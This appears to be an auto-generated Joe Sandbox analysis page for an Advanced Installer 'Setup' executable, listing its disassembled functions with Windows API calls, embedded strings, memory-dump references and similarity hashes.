API ID: CreateFreeMessageSendStringWindow
String ID: AtlAxWin140$&_'
API String ID: 4045344427-2787782922
Opcode ID: 8a1a9c1aed05134833d81a092b8612ce74ba0ffa36a3e24590f7d087cbfb232b
Instruction ID: 89f02f513c7343c2b092494bbbf3ce9471afd1e7646f3b1352b101230a7435fe
Opcode Fuzzy Hash: 8a1a9c1aed05134833d81a092b8612ce74ba0ffa36a3e24590f7d087cbfb232b
Instruction Fuzzy Hash: A3A15675A042199FCF04DF98DC84BAEBBB9FF49710F144199E915AB3A0CB70AD02DB90

Function 0092C719 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 0092C8CC

Part of subcall function 0092A610: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0092C6C5,?,00000000,?,0091BDB9,?,00000004,?,?,?,?,00927FDC), ref: 0092A645

__freea.LIBCMT ref: 0092C8DF
__freea.LIBCMT ref: 0092C8EC

Strings

&_', xrefs: 0092C720

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID: &_'
API String ID: 2243444508-2411122644
Opcode ID: ebebae43405200b7d838d35ff644ffb1752b00d363979c67e9cf590278ff2eb1
Instruction ID: 91a1b9400d0ecbbbbae29e6675fa10874f6080592df8dbf102bcd3e0947bad47
Opcode Fuzzy Hash: ebebae43405200b7d838d35ff644ffb1752b00d363979c67e9cf590278ff2eb1
Instruction Fuzzy Hash: B551B3B2A0022AAFEB206F65EC82EBF36ADEF84710F154529FD04D6154EB74DC50D760

Function 00884860 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,275F2701,00000000,00000000,-00000002,009F03DC,?,?,275F26E1,00991DA6,000000FF), ref: 00884920

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Part of subcall function 00848020: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,275F26E1,?,00000000), ref: 0084806B
Part of subcall function 00848020: GetLastError.KERNEL32(?,00000000), ref: 00848075

Strings

Downloading of updates failed. Error:, xrefs: 008849A7
upd, xrefs: 0088489F
&_', xrefs: 0088487F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CopyErrorFileFormatHeapLastMessageProcess
String ID: Downloading of updates failed. Error:$upd$&_'
API String ID: 2459518595-4035806772
Opcode ID: 652ee1f126c607501159ff1b776da92841a4bb5bc77b4e623cb2da10986cb339
Instruction ID: 01be9d7a72b6f91e31da1fb3398e928bde37c1245ceeb9f4ac6ec2e8f793b6bc
Opcode Fuzzy Hash: 652ee1f126c607501159ff1b776da92841a4bb5bc77b4e623cb2da10986cb339
Instruction Fuzzy Hash: F271E432A002469BDB18EF68CC55BAEB7A5FF40314F14825CE9269B3D1DB34AE05CB90

Function 00870070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,275F26E1,00000000,?,?,?,0085F79E,00000000), ref: 008701C8

Strings

\\?\, xrefs: 008701D5
Extraction path set to:, xrefs: 0087022D
&_', xrefs: 00870087, 008702F7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Path
String ID: Extraction path set to:$\\?\$&_'
API String ID: 2875597873-563036934
Opcode ID: b4a4b650b7fdf5621314c2360eae9a59dbee07282a1739513b5b6810b6ade60c
Instruction ID: 15791d82dd4a3ed0bb2dbe26cb6e52f6b29a94a55308651c879e3b2bbd928f19
Opcode Fuzzy Hash: b4a4b650b7fdf5621314c2360eae9a59dbee07282a1739513b5b6810b6ade60c
Instruction Fuzzy Hash: DD61D071A10616DBCB05DFA8C854BAEB7B6FF44324F158259E929E7391CB30A902CFD1

Function 00882770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 176synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

GetLastError.KERNEL32 ref: 00882802
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088284F

Strings

REST %u, xrefs: 008827CF
&_', xrefs: 00882787

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorHeapLastObjectProcessSingleWait
String ID: REST %u$&_'
API String ID: 1530046183-1391680037
Opcode ID: f216a7be6a9acd72a9964626171e1dfed803d8d04be60d2156370dd7d5bc688f
Instruction ID: 743cba4f9e9a45d72e60665c09594559d7c2ef22f701743d427f1e6bb229ee00
Opcode Fuzzy Hash: f216a7be6a9acd72a9964626171e1dfed803d8d04be60d2156370dd7d5bc688f
Instruction Fuzzy Hash: 3E51EE71A042089FDF44EF68CC85B69BBA6FF84324F254269E825DB3D2DB709D41CB80

Function 0083F300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,80000002,275F26E1,?,80000002,00A68370), ref: 0083F33F
CreateDirectoryW.KERNEL32(80000002,00000000,?,80000002,00A68370), ref: 0083F3A0

Strings

&_', xrefs: 0083F317
ADVINST_LOGS, xrefs: 0083F378

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS$&_'
API String ID: 2885754953-3286276638
Opcode ID: 714f22a21581a27ab80f6bd64bc8002807327cb230c9885926dbea1540eb5ac0
Instruction ID: b823b02e51a55a007e0e87ea9cd618d3d804402d1b75c01bab75b3aa96b5d287
Opcode Fuzzy Hash: 714f22a21581a27ab80f6bd64bc8002807327cb230c9885926dbea1540eb5ac0
Instruction Fuzzy Hash: B751D075D40219CBCB209F28C8447BAB3B4FF94314F2446AEE955D7291EB758E82CBC4

Function 008840B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionNamesW.KERNEL32(00000000,00000100,00883E80), ref: 00884100
GetPrivateProfileSectionNamesW.KERNEL32(00000000,00000100,00000000), ref: 00884154
WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 00884255

Strings

&_', xrefs: 008840C7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: PrivateProfile$NamesSection$StringWrite
String ID: &_'
API String ID: 954649886-2411122644
Opcode ID: 4c35502fbdd4cc1ee4b6409bc3cdba4a683008ab3271cbad3831e60bea7891ca
Instruction ID: 54f45c1fa0b3f04c9601cc862bf08c5aba37e43ad74db6638b5c7cdadd37efd9
Opcode Fuzzy Hash: 4c35502fbdd4cc1ee4b6409bc3cdba4a683008ab3271cbad3831e60bea7891ca
Instruction Fuzzy Hash: 4441C172A0421ADFCB10EFA8DC49BAEBBB5FF45320F144529F92597391DB749900CB91

Function 0072AD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 0072AE90
std::_Throw_Cpp_error.LIBCPMT ref: 0072AE9B

Part of subcall function 0090EB9E: ReleaseSRWLockExclusive.KERNEL32(?,?,0090E728,00A63000,275F26E1,?,?,?,?,00000000,009A5004,000000FF,?,006EF9E0,?,00000001), ref: 0090EBB2

Strings

&_', xrefs: 0072AD69
&_', xrefs: 0072AD56, 0072AEC4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID: &_'$&_'
API String ID: 3666349979-224754792
Opcode ID: e55c6d1cc316abed9fde7c9a2fd69a6df6d5c7df073d9be0a18a97ec6dbbdad8
Instruction ID: 1699f1ee085003de8c9d6c21bd6f7909852de458e2fb40c7c965ac9a78b380c7
Opcode Fuzzy Hash: e55c6d1cc316abed9fde7c9a2fd69a6df6d5c7df073d9be0a18a97ec6dbbdad8
Instruction Fuzzy Hash: 77518DB1E00649DFDB04DF68D8057AEBBB5FF44314F20061AE425A73C1DBB96A05CB91

Function 006E2D10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00A6832C,00000000,275F26E1,00000000,00982843,000000FF,?,275F26E1), ref: 006E2E83
GetLastError.KERNEL32(?,275F26E1), ref: 006E2E8D

Strings

&_', xrefs: 006E2E69
&_', xrefs: 006E2D24, 006E2E61

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: &_'$&_'
API String ID: 439134102-224754792
Opcode ID: 44466fb9cc74be9d15ca40274830f822d19b4d7645bf354682005837914dd1ef
Instruction ID: 60a73ee47502f312de63f9502c3514dfd0c7ba7c07685e7c1b7757ecfc38ce81
Opcode Fuzzy Hash: 44466fb9cc74be9d15ca40274830f822d19b4d7645bf354682005837914dd1ef
Instruction Fuzzy Hash: EE5104B1D01349DBCB10CFA5DC157EE7BF9FB44B14F100629E525AB390DBB89A068B91

Function 00844730 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

&_', xrefs: 0084474F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 36e401df41d5095998164c8c45d0a749be278aa0195a5147fd890d80996629a0
Instruction ID: 0fb23181962821c3caa25050dad802992688957f512911f10cdca2a2a9714e26
Opcode Fuzzy Hash: 36e401df41d5095998164c8c45d0a749be278aa0195a5147fd890d80996629a0
Instruction Fuzzy Hash: 0B419C31604689DFDB24DFA8CC59BADB7A4FF45324F144229E8269B2E1DB349A05CB50

Function 0083EAD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

WriteFile.KERNEL32(?,00000005,?,?,00000000,009D6DBC,00000002,?,00000000,CPU: ,00000005), ref: 0083EBC1
FlushFileBuffers.KERNEL32(?), ref: 0083EBCA

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Strings

CPU: , xrefs: 0083EB28, 0083EB3A, 0083EB44
&_', xrefs: 0083EAE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$BuffersFindFlushHeapProcessResourceWrite
String ID: CPU: $&_'
API String ID: 2793600070-1547987109
Opcode ID: 3d07e8d8493e995f8193ec54100cfc706f9ae8f18131fb49393b173c0ecc1d9d
Instruction ID: c48d9e6eeca363e26e27ac7495ccac3403a097eb4f5f2905b2c2a7b94997e694
Opcode Fuzzy Hash: 3d07e8d8493e995f8193ec54100cfc706f9ae8f18131fb49393b173c0ecc1d9d
Instruction Fuzzy Hash: 1E41AB71A05619ABCB01DBA8CC4ABAEFBB5FF44320F154259E821A73D0DB74AD01DBD0

Function 0084C800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,275F26E1,009ED8E8), ref: 0084C86C
LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 0084C963

Part of subcall function 00837A20: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00837ACA

Strings

&_', xrefs: 0084C82D
Failed to get Windows error message [win32 error 0x, xrefs: 0084C88A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
String ID: Failed to get Windows error message [win32 error 0x$&_'
API String ID: 201254970-442470221
Opcode ID: 7eafb0ce1c56cd8b1d2b8de032272fd5ab33358796ac006fcf19c7e205f104b4
Instruction ID: e41b8efc89e303172891b2db4493e430562694e6ef609711897075907f42ae62
Opcode Fuzzy Hash: 7eafb0ce1c56cd8b1d2b8de032272fd5ab33358796ac006fcf19c7e205f104b4
Instruction Fuzzy Hash: A3419071A05308ABDB50DFA8CD46BAEBBF8FF44714F104159E444E7291DBB49A48CBD2

Function 00704220 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 007042C4
SendMessageW.USER32(?,00000317,00000000,00000006), ref: 007042F0
SendMessageW.USER32(00703F5C,00000318,00000000,00000006), ref: 00704353

Strings

&_', xrefs: 00704234

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$ErrorLast
String ID: &_'
API String ID: 1065017921-2411122644
Opcode ID: 025a5211be3d8202b4a18339bc17e514c0f670d65ab31ea942a60fc0ebaefa61
Instruction ID: 8b7996ea998b76e25ec52cd9b6629c56ad56470f84a180b6360545fb7c94a5c8
Opcode Fuzzy Hash: 025a5211be3d8202b4a18339bc17e514c0f670d65ab31ea942a60fc0ebaefa61
Instruction Fuzzy Hash: E4419DB1A00209EBDB11CFA4CD45BEDBBF8BB08714F100255EA11FB2D2C7759941CB50

Function 00826840 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,275F26E1,?), ref: 008268BE
GetFinalPathNameByHandleW.KERNEL32(00000000,?,00000104,00000000,?,80000000,00000000,00000000,00000003,00000080,00000000,275F26E1,?), ref: 008268F1
CloseHandle.KERNEL32(00000000,?,?,80000000,00000000,00000000,00000003,00000080,00000000,275F26E1,?), ref: 0082696A

Strings

&_', xrefs: 0082686B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Handle$CloseCreateFileFinalNamePath
String ID: &_'
API String ID: 4054139500-2411122644
Opcode ID: 6904632220dc126f8fa3fa52189f8ee4f80da106ca35846ca7543d9ba20a03f6
Instruction ID: e62f05c5282839bd7ac79b2c2fb87ec6a0c9f5bdba7a75d21c179e6924e76127
Opcode Fuzzy Hash: 6904632220dc126f8fa3fa52189f8ee4f80da106ca35846ca7543d9ba20a03f6
Instruction Fuzzy Hash: 8331D570A05314AFDB20DF58EC49BA9FBF4FF48714F10429AE815A72C0EB745A84CB95

Function 0072E370 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72fileCOMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 0072E38D
std::_Throw_Cpp_error.LIBCPMT ref: 0072E39B
DeleteFileW.KERNEL32(?,275F26E1,?,00A63000,?,00000000,00948EC0,000000FF), ref: 0072E3FF

Strings

&_', xrefs: 0072E3C4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$DeleteFile
String ID: &_'
API String ID: 801707934-2411122644
Opcode ID: e497cef2ccf7221c8babd29c35c5c63b9bf33e250f5f429e2e8acdac66677b1d
Instruction ID: a0f42d42de707c46032d09623042840aee808aac12065de01f3cf6fea24b9768
Opcode Fuzzy Hash: e497cef2ccf7221c8babd29c35c5c63b9bf33e250f5f429e2e8acdac66677b1d
Instruction Fuzzy Hash: 4511BF715047249BCB20DF59EC05B9BB7E8EB45721F100B2EE829836D0EB74A9018A94

Function 00880710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0087E11A,0087DAB2,275F26E1,00912CE0,?,00000000), ref: 0088071E
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0087E11A,0087DAB2,275F26E1,00912CE0,?,00000000), ref: 00880749
GetLastError.KERNEL32(0087E11A,0087DAB2,275F26E1,00912CE0,?,00000000,?,?,?,?,?,?,?,?,00990DD5,000000FF), ref: 008807B3

Strings

AdvancedInstaller, xrefs: 0088079A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CreateEvent$ErrorLast
String ID: AdvancedInstaller
API String ID: 1131763895-1372594473
Opcode ID: e836bb2b0e662281c83fb0a7ae61ca1282b344a6dc6db1ae725423cacb911632
Instruction ID: f9e5b115c40720c30d2b26acd52c6be7af1ef481db6c6446f5e06d7c20dbdc96
Opcode Fuzzy Hash: e836bb2b0e662281c83fb0a7ae61ca1282b344a6dc6db1ae725423cacb911632
